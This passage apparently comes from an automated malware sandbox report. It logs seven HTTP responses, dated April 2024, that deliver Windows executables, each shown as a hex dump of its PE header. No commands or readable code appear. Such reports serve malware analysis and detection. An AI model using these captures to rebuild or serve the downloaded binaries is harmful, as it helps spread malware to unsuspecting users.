2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 21:09:08 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Apr 2024 21:09:09 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 15 Mar 2024 11:59:56 GMTETag: "4a4030-613b1bf118700"Accept-Ranges: bytesContent-Length: 4866096Content-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 60 c3 4a 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 37 00 9c 4e 00 00 00 d0 3c 00 eb fe 0d 00 00 00 00 00 00 00 00 00 00 18 4a 00 30 28 00 00 00 30 38 00 84 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 38 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 be 37 00 e0 0b 00 00 00 00 38 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 85 35 00 00 10 00 00 00 86 35 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 3c 3d 00 00 00 a0 35 00 00 3e 00 00 00 8a 35 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 b0 56 01 00 00 e0 35 00 00 58 01 00 00 c8 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 8c 6d 00 00 00 40 37 00 00 00 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9c 4e 00 00 00 b0 37 00 00 50 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 d2 09 00 00 00 00 38 00 00 0a 00 00 00 70 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 10 38 00 00 00 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 38 00 00 02 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 9a 04 00 00 30 38 00 00 9c 04 00 00 7c 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 eb fe 0d 00 00 d0 3c 00 00 00 0e 00 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 21:09:11 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 21:09:12 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 21:09:13 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 21:09:16 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 21:09:17 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 